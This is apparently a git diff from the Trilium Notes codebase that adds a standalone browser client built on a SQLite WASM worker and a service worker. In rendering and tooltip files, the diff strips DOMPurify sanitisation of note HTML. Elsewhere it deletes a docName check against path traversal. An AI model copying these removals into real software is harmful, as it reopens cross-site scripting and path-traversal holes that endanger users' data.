+    }
+
+    initPromise = (async () => {
+        try {
+            // First, load all modules dynamically
+            await loadModules();
+
+            console.log("[Worker] Initializing SQLite WASM...");
+            await sqlProvider!.initWasm();
+
+            // Try to use OPFS for persistent storage
+            if (sqlProvider!.isOpfsAvailable()) {
+                console.log("[Worker] OPFS available, loading persistent database...");
+                sqlProvider!.loadFromOpfs("/trilium.db");
+            } else {
+                // Fall back to in-memory database (non-persistent)
+                console.warn("[Worker] OPFS not available, using in-memory database (data will not persist)");
+                console.warn("[Worker] To enable persistence, ensure COOP/COEP headers are set by the server");
+                sqlProvider!.loadFromMemory();
+            }
+
+            console.log("[Worker] Database loaded");
+
+            console.log("[Worker] Loading @triliumnext/core...");
+            const schemaModule = await import("@triliumnext/core/src/assets/schema.sql?raw");
+            coreModule = await import("@triliumnext/core");
+            await coreModule.initializeCore({
+                executionContext: new BrowserExecutionContext(),
+                crypto: new BrowserCryptoProvider(),
+                messaging: messagingProvider!,
+                request: new FetchRequestProvider(),
+                translations: translationProvider,
+                schema: schemaModule.default,
+                dbConfig: {
+                    provider: sqlProvider!,
+                    isReadOnly: false,
+                    onTransactionCommit: () => {
+                        coreModule?.ws.sendTransactionEntityChangesToAllClients();
+                    },
+                    onTransactionRollback: () => {
+                        // No-op for now
+                    }
+                }
+            });
+            coreModule.ws.init();
+
+            console.log("[Worker] Supported routes", Object.keys(coreModule.routes));
+
+            // Create and configure the router
+            router = createConfiguredRouter();
+            console.log("[Worker] Router configured");
+
+            // initializeDb runs initDbConnection inside an execution context,
+            // which resolves dbReady — required before beccaLoaded can settle.
+            coreModule.sql_init.initializeDb();
+
+            if (coreModule.sql_init.isDbInitialized()) {
+                console.log("[Worker] Database already initialized, loading becca...");
+                await coreModule.becca_loader.beccaLoaded;
+            } else {
+                console.log("[Worker] Database not initialized, skipping becca load (will be loaded during DB initialization)");
+            }
+
+            console.log("[Worker] Initialization complete");
+        } catch (error) {
+            initError = error instanceof Error ? error : new Error(String(error));
+            console.error("[Worker] Initialization failed:", initError);
+            throw initError;
+        }
+    })();
+
+    return initPromise;
+}
+
+/**
+ * Ensure the worker is initialized before processing requests.
+ * Returns the router if initialization was successful.
+ */
+async function ensureInitialized() {
+    await initialize();
+    if (!router) {
+        throw new Error("Router not initialized");
+    }
+    return router;
+}
+
+interface LocalRequest {
+    method: string;
+    url: string;
+    body?: unknown;
+    headers?: Record<string, string>;
+}
+
+// Main dispatch
+async function dispatch(request: LocalRequest) {
+    // Ensure initialization is complete and get the router
+    const appRouter = await ensureInitialized();
+
+    // Dispatch to the router
+    return appRouter.dispatch(request.method, request.url, request.body, request.headers);
+}
+
+// Start initialization immediately when the worker loads
+console.log("[Worker] Starting initialization...");
+initialize().catch(err => {
+    console.error("[Worker] Initialization failed:", err);
+    // Post error to main thread
+    self.postMessage({
+        type: "WORKER_ERROR",
+        error: {
+            message: String(err?.message || err),
+            stack: err?.stack
+        }
+    });
+});
+
+self.onmessage = async (event) => {
+    const msg = event.data;
+    if (!msg || msg.type !== "LOCAL_REQUEST") return;
+
+    const { id, request } = msg;
+
+    try {
+        const response = await dispatch(request);
+
+        // Transfer body back (if any) - use options object for proper typing
+        (self as unknown as Worker).postMessage({
+            type: "LOCAL_RESPONSE",
+            id,
+            response
+        }, { transfer: response.body ? [response.body] : [] });
+    } catch (e) {
+        console.error("[Worker] Dispatch error:", e);
+        (self as unknown as Worker).postMessage({
+            type: "LOCAL_RESPONSE",
+            id,
+            error: String((e as Error)?.message || e)
+        });
+    }
+};

apps/client-standalone/src/main.ts

@@ -0,0 +1,84 @@
+import { attachServiceWorkerBridge, startLocalServerWorker } from "./local-bridge.js";
+
+async function waitForServiceWorkerControl(): Promise<void> {
+    if (!("serviceWorker" in navigator)) {
+        throw new Error("Service Worker not supported in this browser");
+    }
+
+    // If already controlling, we're good
+    if (navigator.serviceWorker.controller) {
+        console.log("[Bootstrap] Service worker already controlling");
+        return;
+    }
+
+    console.log("[Bootstrap] Waiting for service worker to take control...");
+
+    // Register service worker
+    await navigator.serviceWorker.register("./sw.js", { scope: "/" });
+
+    // Wait for it to be ready (installed + activated)
+    await navigator.serviceWorker.ready;
+
+    // Check if we're now controlling
+    if (navigator.serviceWorker.controller) {
+        console.log("[Bootstrap] Service worker now controlling");
+        return;
+    }
+
+    // If not controlling yet, we need to reload the page for SW to take control
+    // This is standard PWA behavior on first install
+    console.log("[Bootstrap] Service worker installed but not controlling yet - reloading page");
+
+    // Wait a tiny bit for SW to fully activate
+    await new Promise(resolve => setTimeout(resolve, 100));
+
+    // Reload to let SW take control
+    window.location.reload();
+
+    // Throw to stop execution (page will reload)
+    throw new Error("Reloading for service worker activation");
+}
+
+async function bootstrap() {
+    /* fixes https://github.com/webpack/webpack/issues/10035 */
+    window.global = globalThis;
+
+    try {
+        // 1) Start local worker ASAP (so /bootstrap is fast)
+        startLocalServerWorker();
+
+        // 2) Bridge SW -> local worker
+        attachServiceWorkerBridge();
+
+        // 3) Wait for service worker to control the page (may reload on first install)
+        await waitForServiceWorkerControl();
+
+        await loadScripts();
+    } catch (err) {
+        // If error is from reload, it will stop here (page reloads)
+        // Otherwise, show error to user
+        if (err instanceof Error && err.message.includes("Reloading")) {
+            // Page is reloading, do nothing
+            return;
+        }
+
+        console.error("[Bootstrap] Fatal error:", err);
+        document.body.innerHTML = `
+            <div style="padding: 40px; max-width: 600px; margin: 0 auto; font-family: system-ui, sans-serif;">
+                <h1 style="color: #d32f2f;">Failed to Initialize</h1>
+                <p>The application failed to start. Please check the browser console for details.</p>
+                <pre style="background: #f5f5f5; padding: 16px; border-radius: 4px; overflow: auto;">${err instanceof Error ? err.message : String(err)}</pre>
+                <button onclick="location.reload()" style="padding: 12px 24px; background: #1976d2; color: white; border: none; border-radius: 4px; cursor: pointer; font-size: 16px;">
+                    Reload Page
+                </button>
+            </div>
+        `;
+        document.body.style.display = "block";
+    }
+}
+
+async function loadScripts() {
+    await import("../../client/src/index.js");
+}
+
+bootstrap();

apps/client-standalone/src/sw.ts

@@ -0,0 +1,185 @@
+// public/sw.js
+const VERSION = "localserver-v1.4";
+const STATIC_CACHE = `static-${VERSION}`;
+
+// Check if running in dev mode (passed via URL parameter)
+const isDev = true;
+
+if (isDev) {
+    console.log('[Service Worker] Running in DEV mode - caching disabled');
+}
+
+// Adjust these to your routes:
+const LOCAL_FIRST_PREFIXES = [
+    "/bootstrap",
+    "/api/",
+    "/sync/",
+    "/search/"
+];
+
+// Optional: basic precache list (keep small; you can expand later)
+const PRECACHE_URLS = [
+    // "/",
+    // "/index.html",
+    // "/manifest.webmanifest",
+    // "/favicon.ico",
+];
+
+self.addEventListener("install", (event) => {
+    event.waitUntil((async () => {
+        // Skip precaching in dev mode
+        if (!isDev) {
+            const cache = await caches.open(STATIC_CACHE);
+            await cache.addAll(PRECACHE_URLS);
+        }
+        self.skipWaiting();
+    })());
+});
+
+self.addEventListener("activate", (event) => {
+    event.waitUntil((async () => {
+    // Cleanup old caches
+        const keys = await caches.keys();
+        await Promise.all(keys.map((k) => (k === STATIC_CACHE ? Promise.resolve() : caches.delete(k))));
+        await self.clients.claim();
+    })());
+});
+
+function isLocalFirst(url) {
+    return LOCAL_FIRST_PREFIXES.some((p) => url.pathname.startsWith(p));
+}
+
+async function cacheFirst(request) {
+    // In dev mode, always bypass cache
+    if (isDev) {
+        return fetch(request);
+    }
+
+    const cache = await caches.open(STATIC_CACHE);
+    const cached = await cache.match(request);
+    if (cached) return cached;
+
+    const fresh = await fetch(request);
+    // Cache only successful GETs
+    if (request.method === "GET" && fresh.ok) cache.put(request, fresh.clone());
+    return fresh;
+}
+
+async function networkFirst(request) {
+    // In dev mode, always bypass cache
+    if (isDev) {
+        return fetch(request);
+    }
+
+    const cache = await caches.open(STATIC_CACHE);
+    try {
+        const fresh = await fetch(request);
+        // Cache only successful GETs
+        if (request.method === "GET" && fresh.ok) cache.put(request, fresh.clone());
+        return fresh;
+    } catch (error) {
+        // Fallback to cache if network fails
+        const cached = await cache.match(request);
+        if (cached) return cached;
+        throw error;
+    }
+}
+
+async function forwardToClientLocalServer(request, clientId) {
+    // Find a client to handle the request (prefer the initiating client if available)
+    let client = clientId ? await self.clients.get(clientId) : null;
+
+    if (!client) {
+        const all = await self.clients.matchAll({ type: "window", includeUncontrolled: true });
+        client = all[0] || null;
+    }
+
+    // If no page is available, fall back to network
+    if (!client) return fetch(request);
+
+    const reqUrl = request.url;
+    const headersObj = {};
+    for (const [k, v] of request.headers.entries()) headersObj[k] = v;
+
+    const body = (request.method === "GET" || request.method === "HEAD")
+        ? null
+        : await request.arrayBuffer();
+
+    const id = crypto.randomUUID();
+    const channel = new MessageChannel();
+
+    const responsePromise = new Promise((resolve, reject) => {
+        const timeout = setTimeout(() => {
+            reject(new Error("Local server timeout"));
+        }, 30_000);
+
+        channel.port1.onmessage = (event) => {
+            clearTimeout(timeout);
+            resolve(event.data);
+        };
+        channel.port1.onmessageerror = () => {
+            clearTimeout(timeout);
+            reject(new Error("Local server message error"));
+        };
+    });
+
+    // Send to the client with a reply port
+    client.postMessage({
+        type: "LOCAL_FETCH",
+        id,
+        request: {
+            url: reqUrl,
+            method: request.method,
+            headers: headersObj,
+            body // ArrayBuffer or null
+        }
+    }, [channel.port2]);
+
+    const localResp = await responsePromise;
+
+    if (!localResp || localResp.type !== "LOCAL_FETCH_RESPONSE" || localResp.id !== id) {
+    // Protocol mismatch; fall back
+        return fetch(request);
+    }
+
+    // localResp.response: { status, headers, body }
+    const { status, headers, body: respBody } = localResp.response;
+
+    const respHeaders = new Headers();
+    if (headers) {
+        for (const [k, v] of Object.entries(headers)) respHeaders.set(k, String(v));
+    }
+
+    return new Response(respBody ? respBody : null, {
+        status: status || 200,
+        headers: respHeaders
+    });
+}
+
+self.addEventListener("fetch", (event) => {
+    const url = new URL(event.request.url);
+
+    // Only handle same-origin
+    if (url.origin !== self.location.origin) return;
+
+    // HTML files: network-first to ensure updates are reflected immediately
+    if (event.request.mode === "navigate" || url.pathname.endsWith(".html")) {
+        event.respondWith(networkFirst(event.request));
+        return;
+    }
+
+    // Static assets: cache-first for performance
+    if (event.request.method === "GET" && !isLocalFirst(url)) {
+        event.respondWith(cacheFirst(event.request));
+        return;
+    }
+
+    // API-ish: local-first via bridge
+    if (isLocalFirst(url)) {
+        event.respondWith(forwardToClientLocalServer(event.request, event.clientId));
+        return;
+    }
+
+    // Default
+    event.respondWith(fetch(event.request));
+});

apps/client-standalone/src/vite-env.d.ts

@@ -0,0 +1,31 @@
+/// <reference types="vite/client" />
+
+interface ImportMetaEnv {
+  readonly VITE_APP_TITLE: string
+}
+
+interface ImportMeta {
+  readonly env: ImportMetaEnv
+}
+
+interface Window {
+  glob: {
+    assetPath: string;
+    themeCssUrl?: string;
+    themeUseNextAsBase?: string;
+    iconPackCss: string;
+    device: string;
+    headingStyle: string;
+    layoutOrientation: string;
+    platform: string;
+    isElectron: boolean;
+    hasNativeTitleBar: boolean;
+    hasBackgroundEffects: boolean;
+    currentLocale: {
+      id: string;
+      rtl: boolean;
+    };
+    activeDialog: any;
+  };
+  global: typeof globalThis;
+}

apps/client-standalone/tsconfig.app.json

@@ -0,0 +1,26 @@
+{
+  "extends": "../../tsconfig.base.json",
+  "compilerOptions": {
+    "lib": [
+      "ES2022",
+      "dom",
+      "dom.iterable"
+    ],
+    "skipLibCheck": true,
+    "types": [
+      "vite/client"
+    ],
+    "jsx": "react-jsx",
+    "jsxImportSource": "preact"
+  },
+  "include": [
+    "src/**/*",
+    "../client/src/**/*"
+  ],
+  "exclude": [
+    "src/**/*.spec.ts",
+    "src/**/*.test.ts",
+    "../client/src/**/*.spec.ts",
+    "../client/src/**/*.test.ts"
+  ]
+}

apps/client-standalone/tsconfig.json

@@ -0,0 +1,7 @@
+{
+  "extends": "../../tsconfig.base.json",
+  "references": [
+    { "path": "./tsconfig.app.json" },
+    { "path": "./tsconfig.spec.json" }
+  ]
+}

apps/client-standalone/tsconfig.spec.json

@@ -0,0 +1,18 @@
+{
+  "extends": "../../tsconfig.base.json",
+  "compilerOptions": {
+    "lib": [
+      "ES2022",
+      "dom",
+      "dom.iterable"
+    ],
+    "types": [
+      "vitest/globals",
+      "happy-dom"
+    ]
+  },
+  "include": [
+    "src/**/*.spec.ts",
+    "src/**/*.test.ts"
+  ]
+}

apps/client-standalone/vite.config.mts

@@ -0,0 +1,188 @@
+import prefresh from '@prefresh/vite';
+import { join } from 'path';
+import { defineConfig } from 'vite';
+import { viteStaticCopy } from 'vite-plugin-static-copy';
+
+const clientAssets = ["assets", "stylesheets", "fonts", "translations"];
+
+const isDev = process.env.NODE_ENV === "development";
+
+// Watch client files and trigger reload in development
+const clientWatchPlugin = () => ({
+    name: 'client-watch',
+    configureServer(server: any) {
+        if (isDev) {
+            // Watch client source files (adjusted for new root)
+            server.watcher.add('../../client/src/**/*');
+            server.watcher.on('change', (file: string) => {
+                if (file.includes('../../client/src/')) {
+                    server.ws.send({
+                        type: 'full-reload'
+                    });
+                }
+            });
+        }
+    }
+});
+
+// Always copy SQLite WASM files so they're available to the module
+const sqliteWasmPlugin = viteStaticCopy({
+    targets: [
+        {
+            src: "../../../node_modules/@sqlite.org/sqlite-wasm/sqlite-wasm/jswasm/sqlite3.wasm",
+            dest: "assets"
+        },
+        {
+            src: "../../../node_modules/@sqlite.org/sqlite-wasm/sqlite-wasm/jswasm/sqlite3-opfs-async-proxy.js",
+            dest: "assets"
+        }
+    ]
+});
+
+let plugins: any = [
+    sqliteWasmPlugin,  // Always include SQLite WASM files
+    viteStaticCopy({
+        targets: clientAssets.map((asset) => ({
+            src: `../../client/src/${asset}/*`,
+            dest: asset
+        })),
+        // Enable watching in development
+        ...(isDev && {
+            watch: {
+                reloadPageOnChange: true
+            }
+        })
+    }),
+    viteStaticCopy({
+        targets: [
+            {
+                src: "../../server/src/assets/*",
+                dest: "server-assets"
+            }
+        ]
+    }),
+    // Watch client files for changes in development
+    ...(isDev ? [
+        prefresh(),
+        clientWatchPlugin()
+    ] : [])
+];
+
+if (!isDev) {
+    plugins = [
+        ...plugins,
+        viteStaticCopy({
+            structured: true,
+            targets: [
+                {
+                    src: "../../../node_modules/@excalidraw/excalidraw/dist/prod/fonts/*",
+                    dest: "",
+                }
+            ]
+        })
+    ]
+}
+
+export default defineConfig(() => ({
+    root: join(__dirname, 'src'),  // Set src as root so index.html is served from /
+    envDir: __dirname,  // Load .env files from client-standalone directory, not src/
+    cacheDir: '../../../node_modules/.vite/apps/client-standalone',
+    base: "",
+    plugins,
+    esbuild: {
+        jsx: 'automatic',
+        jsxImportSource: 'preact',
+        jsxDev: isDev
+    },
+    css: {
+        transformer: 'lightningcss',
+        devSourcemap: isDev
+    },
+    publicDir: join(__dirname, 'public'),
+    resolve: {
+        alias: [
+            {
+                find: "react",
+                replacement: "preact/compat"
+            },
+            {
+                find: "react-dom",
+                replacement: "preact/compat"
+            },
+            {
+                find: "@client",
+                replacement: join(__dirname, "../client/src")
+            }
+        ],
+        dedupe: [
+            "react",
+            "react-dom",
+            "preact",
+            "preact/compat",
+            "preact/hooks"
+        ]
+    },
+    server: {
+        watch: {
+            // Watch workspace packages
+            ignored: ['!**/node_modules/@triliumnext/**'],
+            // Also watch client assets for live reload
+            usePolling: false,
+            interval: 100,
+            binaryInterval: 300
+        },
+        // Watch additional directories for changes
+        fs: {
+            allow: [
+                // Allow access to workspace root
+                '../../../',
+                // Explicitly allow client directory
+                '../../client/src/'
+            ]
+        },
+        headers: {
+            // Required for SharedArrayBuffer which is needed by SQLite WASM OPFS VFS
+            // See: https://sqlite.org/wasm/doc/trunk/persistence.md#coop-coep
+            "Cross-Origin-Opener-Policy": "same-origin",
+            "Cross-Origin-Embedder-Policy": "require-corp"
+        }
+    },
+    optimizeDeps: {
+        exclude: ['@sqlite.org/sqlite-wasm', '@triliumnext/core']
+    },
+    worker: {
+        format: "es" as const
+    },
+    commonjsOptions: {
+        transformMixedEsModules: true,
+    },
+    build: {
+        target: "esnext",
+        outDir: join(__dirname, 'dist'),
+        emptyOutDir: true,
+        rollupOptions: {
+            input: {
+                main: join(__dirname, 'src', 'index.html'),
+                sw: join(__dirname, 'src', 'sw.ts'),
+                'local-bridge': join(__dirname, 'src', 'local-bridge.ts'),
+            },
+            output: {
+                entryFileNames: (chunkInfo) => {
+                    // Service worker and other workers should be at root level
+                    if (chunkInfo.name === 'sw') {
+                        return '[name].js';
+                    }
+                    return 'src/[name].js';
+                },
+                chunkFileNames: "src/[name].js",
+                assetFileNames: "src/[name].[ext]"
+            }
+        }
+    },
+    test: {
+        environment: "happy-dom"
+    },
+    define: {
+        "process.env.IS_PREACT": JSON.stringify("true"),
+    }
+}));

apps/client/package.json

@@ -50,7 +50,6 @@
     "clsx": "2.1.1",
     "color": "5.0.3",
     "debounce": "3.0.0",
-    "dompurify": "3.2.5",
     "draggabilly": "3.0.0",
     "force-graph": "1.51.2",
     "globals": "17.4.0",
@@ -92,4 +91,4 @@
     "script-loader": "0.7.2",
     "vite-plugin-static-copy": "3.3.0"
   }
-}
+}

apps/client/src/index.ts

@@ -36,10 +36,37 @@ async function setupGlob() {
     window.global = globalThis; /* fixes https://github.com/webpack/webpack/issues/10035 */
     window.glob = {
         ...json,
-        activeDialog: null
+        activeDialog: null,
+        device: json.device || getDevice()
     };
 }
 
+function getDevice() {
+    // Respect user's manual override via URL.
+    const urlParams = new URLSearchParams(window.location.search);
+    if (urlParams.has("print")) {
+        return "print";
+    } else if (urlParams.has("desktop")) {
+        return "desktop";
+    } else if (urlParams.has("mobile")) {
+        return "mobile";
+    }
+
+    const deviceCookie = document.cookie.split("; ").find(row => row.startsWith("trilium-device="))?.split("=")[1];
+    if (deviceCookie === "desktop" || deviceCookie === "mobile") return deviceCookie;
+    return isMobile() ? "mobile" : "desktop";
+}
+
+// https://stackoverflow.com/a/73731646/944162
+function isMobile() {
+    const mQ = matchMedia?.("(pointer:coarse)");
+    if (mQ?.media === "(pointer:coarse)") return !!mQ.matches;
+
+    if ("orientation" in window) return true;
+    const userAgentsRegEx = /\b(Android|iPhone|iPad|iPod|Windows Phone|BlackBerry|webOS|IEMobile)\b/i;
+    return userAgentsRegEx.test(navigator.userAgent);
+}
+
 async function loadBootstrapCss() {
     // We have to selectively import Bootstrap CSS based on text direction.
     if (glob.isRtl) {
@@ -85,6 +112,8 @@ function loadIcons() {
 }
 
 function setBodyAttributes() {
+    if (!glob.dbInitialized) return;
+
     const { device, headingStyle, layoutOrientation, platform, isElectron, hasNativeTitleBar, hasBackgroundEffects, currentLocale } = window.glob;
     const classesToSet = [
         device,
@@ -105,6 +134,11 @@ function setBodyAttributes() {
 }
 
 async function loadScripts() {
+    if (!glob.dbInitialized) {
+        await import("./setup.js");
+        return;
+    }
+
     switch (glob.device) {
         case "mobile":
             await import("./mobile.js");

apps/client/src/layouts/desktop_layout.tsx

@@ -30,6 +30,7 @@ import SpacerWidget from "../widgets/launch_bar/SpacerWidget.jsx";
 import InlineTitle from "../widgets/layout/InlineTitle.jsx";
 import NoteBadges from "../widgets/layout/NoteBadges.jsx";
 import NoteTitleActions from "../widgets/layout/NoteTitleActions.jsx";
+import StandaloneWarningBar from "../widgets/layout/StandaloneWarningBar.jsx";
 import StatusBar from "../widgets/layout/StatusBar.jsx";
 import NoteIconWidget from "../widgets/note_icon.jsx";
 import NoteTitleWidget from "../widgets/note_title.jsx";
@@ -186,6 +187,7 @@ export default class DesktopLayout {
                     )
             )
             .optChild(launcherPaneIsHorizontal && isNewLayout, <StatusBar />)
+            .optChild(glob.isStandalone, <StandaloneWarningBar />)
             .child(<CloseZenModeButton />)
 
             // Desktop-specific dialogs.

apps/client/src/layouts/mobile_layout.tsx

@@ -13,6 +13,7 @@ import LauncherContainer from "../widgets/launch_bar/LauncherContainer.jsx";
 import InlineTitle from "../widgets/layout/InlineTitle.jsx";
 import NoteBadges from "../widgets/layout/NoteBadges.jsx";
 import NoteTitleActions from "../widgets/layout/NoteTitleActions.jsx";
+import StandaloneWarningBar from "../widgets/layout/StandaloneWarningBar";
 import MobileDetailMenu from "../widgets/mobile_widgets/mobile_detail_menu.js";
 import ScreenContainer from "../widgets/mobile_widgets/screen_container.js";
 import SidebarContainer from "../widgets/mobile_widgets/sidebar_container.js";
@@ -55,6 +56,7 @@ export default class MobileLayout {
                             .child(
                                 new SplitNoteContainer(() =>
                                     new NoteWrapperWidget()
+                                        .optChild(glob.isStandalone, <StandaloneWarningBar />)
                                         .child(
                                             new FlexContainer("row")
                                                 .class("title-row note-split-title")

apps/client/src/services/content_renderer_text.ts

@@ -5,7 +5,6 @@ import froca from "./froca.js";
 import link from "./link.js";
 import { renderMathInElement } from "./math.js";
 import { getMermaidConfig } from "./mermaid.js";
-import { sanitizeNoteContentHtml } from "./sanitize_content.js";
 import { formatCodeBlocks } from "./syntax_highlight.js";
 import tree from "./tree.js";
 import { isHtmlEmpty } from "./utils.js";
@@ -15,7 +14,7 @@ export default async function renderText(note: FNote | FAttachment, $renderedCon
     const blob = await note.getBlob();
 
     if (blob && !isHtmlEmpty(blob.content)) {
-        $renderedContent.append($('<div class="ck-content">').html(sanitizeNoteContentHtml(blob.content)));
+        $renderedContent.append($('<div class="ck-content">').html(blob.content));
 
         const seenNoteIds = options.seenNoteIds ?? new Set<string>();
         seenNoteIds.add("noteId" in note ? note.noteId : note.attachmentId);

apps/client/src/services/doc_renderer.ts

@@ -5,19 +5,10 @@ import { formatCodeBlocks } from "./syntax_highlight.js";
 
 export default function renderDoc(note: FNote) {
     return new Promise<JQuery<HTMLElement>>((resolve) => {
-        let docName = note.getLabelValue("docName");
+        const docName = note.getLabelValue("docName");
         const $content = $("<div>");
 
         if (docName) {
-            // Sanitize docName to prevent path traversal attacks (e.g.,
-            // "../../../../api/notes/_malicious/open?x=" escaping doc_notes).
-            docName = sanitizeDocName(docName);
-            if (!docName) {
-                console.warn("Blocked potentially malicious docName attribute value.");
-                resolve($content);
-                return;
-            }
-
             // find doc based on language
             const url = getUrl(docName, getCurrentLanguage());
             $content.load(url, async (response, status) => {
@@ -25,7 +16,7 @@ export default function renderDoc(note: FNote) {
                 if (status === "error") {
                     const fallbackUrl = getUrl(docName, "en");
                     $content.load(fallbackUrl, async () => {
-                        await processContent(fallbackUrl, $content)
+                        await processContent(fallbackUrl, $content);
                         resolve($content);
                     });
                     return;
@@ -46,9 +37,9 @@ async function processContent(url: string, $content: JQuery<HTMLElement>) {
     const dir = url.substring(0, url.lastIndexOf("/"));
 
     // Images are relative to the docnote but that will not work when rendered in the application since the path breaks.
-    $content.find("img").each((i, el) => {
+    $content.find("img").each((_i, el) => {
         const $img = $(el);
-        $img.attr("src", dir + "/" + $img.attr("src"));
+        $img.attr("src", `${dir}/${$img.attr("src")}`);
     });
 
     formatCodeBlocks($content);
@@ -57,35 +48,20 @@ async function processContent(url: string, $content: JQuery<HTMLElement>) {
     await applyReferenceLinks($content[0]);
 }
 
-function sanitizeDocName(docNameValue: string): string | null {
-    // Strip any path traversal sequences and dangerous URL characters.
-    // Legitimate docName values are simple paths like "User Guide/Topic" or
-    // "launchbar_intro" — they only contain alphanumeric chars, underscores,
-    // hyphens, spaces, and forward slashes for subdirectories.
-    // Reject values containing path traversal (../, ..\) or URL control
-    // characters (?, #, :, @) that could be used to escape the doc_notes
-    // directory or manipulate the resulting URL.
-    if (/\.\.|[?#:@\\]/.test(docNameValue)) {
-        return null;
-    }
-
-    // Remove any leading slashes to prevent absolute path construction.
-    docNameValue = docNameValue.replace(/^\/+/, "");
-
-    // After stripping, ensure only safe characters remain:
-    // alphanumeric, spaces, underscores, hyphens, forward slashes, and periods
-    // (periods are allowed for filenames but .. was already rejected above).
-    if (!/^[a-zA-Z0-9 _\-/.']+$/.test(docNameValue)) {
-        return null;
-    }
-
-    return docNameValue;
-}
-
 function getUrl(docNameValue: string, language: string) {
     // Cannot have spaces in the URL due to how JQuery.load works.
     docNameValue = docNameValue.replaceAll(" ", "%20");
-
-    const basePath = window.glob.isDev ? window.glob.assetPath + "/.." : window.glob.assetPath;
-    return `${basePath}/doc_notes/${language}/${docNameValue}.html`;
+    // The user guide is available only in English, so make sure we are requesting correctly since 404s in standalone client are treated differently.
+    if (docNameValue.includes("User%20Guide")) language = "en";
+    return `${getBasePath()}/doc_notes/${language}/${docNameValue}.html`;
+}
+
+function getBasePath() {
+    if (window.glob.isStandalone) {
+        return `server-assets`;
+    }
+    if (window.glob.isDev) {
+        return `${window.glob.assetPath  }/..`;
+    }
+    return window.glob.assetPath;
 }

apps/client/src/services/froca.ts

@@ -1,11 +1,11 @@
+import appContext from "../components/app_context.js";
+import FAttachment, { type FAttachmentRow } from "../entities/fattachment.js";
+import FAttribute, { type FAttributeRow } from "../entities/fattribute.js";
+import FBlob, { type FBlobRow } from "../entities/fblob.js";
 import FBranch, { type FBranchRow } from "../entities/fbranch.js";
 import FNote, { type FNoteRow } from "../entities/fnote.js";
-import FAttribute, { type FAttributeRow } from "../entities/fattribute.js";
-import server from "./server.js";
-import appContext from "../components/app_context.js";
-import FBlob, { type FBlobRow } from "../entities/fblob.js";
-import FAttachment, { type FAttachmentRow } from "../entities/fattachment.js";
 import type { Froca } from "./froca-interface.js";
+import server from "./server.js";
 
 interface SubtreeResponse {
     notes: FNoteRow[];
@@ -44,8 +44,9 @@ class FrocaImpl implements Froca {
     }
 
     async loadInitialTree() {
-        const resp = await server.get<SubtreeResponse>("tree");
+        if (!glob.dbInitialized) return;
 
+        const resp = await server.get<SubtreeResponse>("tree");
         // clear the cache only directly before adding new content which is important for e.g., switching to protected session
         this.#clear();
         this.addResp(resp);
@@ -77,7 +78,7 @@ class FrocaImpl implements Froca {
         for (const noteRow of noteRows) {
             const { noteId } = noteRow;
 
-            let note = this.notes[noteId];
+            const note = this.notes[noteId];
 
             if (note) {
                 note.update(noteRow);
@@ -240,9 +241,8 @@ class FrocaImpl implements Froca {
                     console.trace(`Can't find note '${noteId}'`);
 
                     return null;
-                } else {
-                    return this.notes[noteId];
                 }
+                return this.notes[noteId];
             })
             .filter((note) => !!note) as FNote[];
     }
@@ -263,9 +263,8 @@ class FrocaImpl implements Froca {
                     console.trace(`Can't find note '${noteId}'`);
 
                     return null;
-                } else {
-                    return this.notes[noteId];
                 }
+                return this.notes[noteId];
             })
             .filter((note) => !!note) as FNote[];
     }
@@ -338,11 +337,10 @@ class FrocaImpl implements Froca {
             attachmentRows = await server.getWithSilentNotFound<FAttachmentRow[]>(`attachments/${attachmentId}/all`);
         } catch (e: any) {
             if (silentNotFoundError) {
-                logInfo(`Attachment '${attachmentId}' not found, but silentNotFoundError is enabled: ` + e.message);
+                logInfo(`Attachment '${attachmentId}' not found, but silentNotFoundError is enabled: ${  e.message}`);
                 return null;
-            } else {
-                throw e;
             }
+            throw e;
         }
 
         const attachments = this.processAttachmentRows(attachmentRows);

apps/client/src/services/frontend_script_api.ts

@@ -206,7 +206,7 @@ export interface Api {
      * Instance name identifies particular Trilium instance. It can be useful for scripts
      * if some action needs to happen on only one specific instance.
      */
-    getInstanceName(): string;
+    getInstanceName(): string | null;
 
     /**
      * @returns date in YYYY-MM-DD format

apps/client/src/services/i18n.ts

@@ -1,16 +1,17 @@
-import options from "./options.js";
+import { type Locale, LOCALE_IDS, setDayjsLocale } from "@triliumnext/commons";
 import i18next from "i18next";
 import i18nextHttpBackend from "i18next-http-backend";
-import server from "./server.js";
-import { LOCALE_IDS, setDayjsLocale, type Locale } from "@triliumnext/commons";
 import { initReactI18next } from "react-i18next";
 
+import options from "./options.js";
+import server from "./server.js";
+
 let locales: Locale[] | null;
 
 /**
  * A deferred promise that resolves when translations are initialized.
  */
-export let translationsInitializedPromise = $.Deferred();
+export const translationsInitializedPromise = $.Deferred();
 
 export async function initLocale() {
     const locale = ((options.get("locale") as string) || "en") as LOCALE_IDS;
@@ -34,7 +35,7 @@ export async function initLocale() {
 
 export function getAvailableLocales() {
     if (!locales) {
-        throw new Error("Tried to load list of locales, but localization is not yet initialized.")
+        throw new Error("Tried to load list of locales, but localization is not yet initialized.");
     }
 
     return locales;

apps/client/src/services/note_tooltip.ts

@@ -5,7 +5,6 @@ import contentRenderer from "./content_renderer.js";
 import froca from "./froca.js";
 import { t } from "./i18n.js";
 import linkService from "./link.js";
-import { sanitizeNoteContentHtml } from "./sanitize_content.js";
 import treeService from "./tree.js";
 import utils from "./utils.js";
 
@@ -93,9 +92,8 @@ async function mouseEnterHandler<T>(this: HTMLElement, e: JQuery.TriggeredEvent<
         return;
     }
 
-    const sanitizedContent = sanitizeNoteContentHtml(content);
-    const html = `<div class="note-tooltip-content">${sanitizedContent}</div>`;
-    const tooltipClass = `tooltip-${Math.floor(Math.random() * 999_999_999)}`;
+    const html = `<div class="note-tooltip-content">${content}</div>`;
+    const tooltipClass = `tooltip-${  Math.floor(Math.random() * 999_999_999)}`;
 
     // we need to check if we're still hovering over the element
     // since the operation to get tooltip content was async, it is possible that
@@ -112,8 +110,6 @@ async function mouseEnterHandler<T>(this: HTMLElement, e: JQuery.TriggeredEvent<
             title: html,
             html: true,
             template: `<div class="tooltip note-tooltip ${tooltipClass}" role="tooltip"><div class="arrow"></div><div class="tooltip-inner"></div></div>`,
-            // Content is pre-sanitized via DOMPurify so Bootstrap's built-in sanitizer
-            // (which is too aggressive for our rich-text content) can be disabled.
             sanitize: false,
             customClass: linkId
         });

apps/client/src/services/promoted_attribute_definition_parser.ts

@@ -1,14 +1,4 @@
-export type LabelType = "text" | "textarea" | "number" | "boolean" | "date" | "datetime" | "time" | "url" | "color";
-type Multiplicity = "single" | "multi";
-
-export interface DefinitionObject {
-    isPromoted?: boolean;
-    labelType?: LabelType;
-    multiplicity?: Multiplicity;
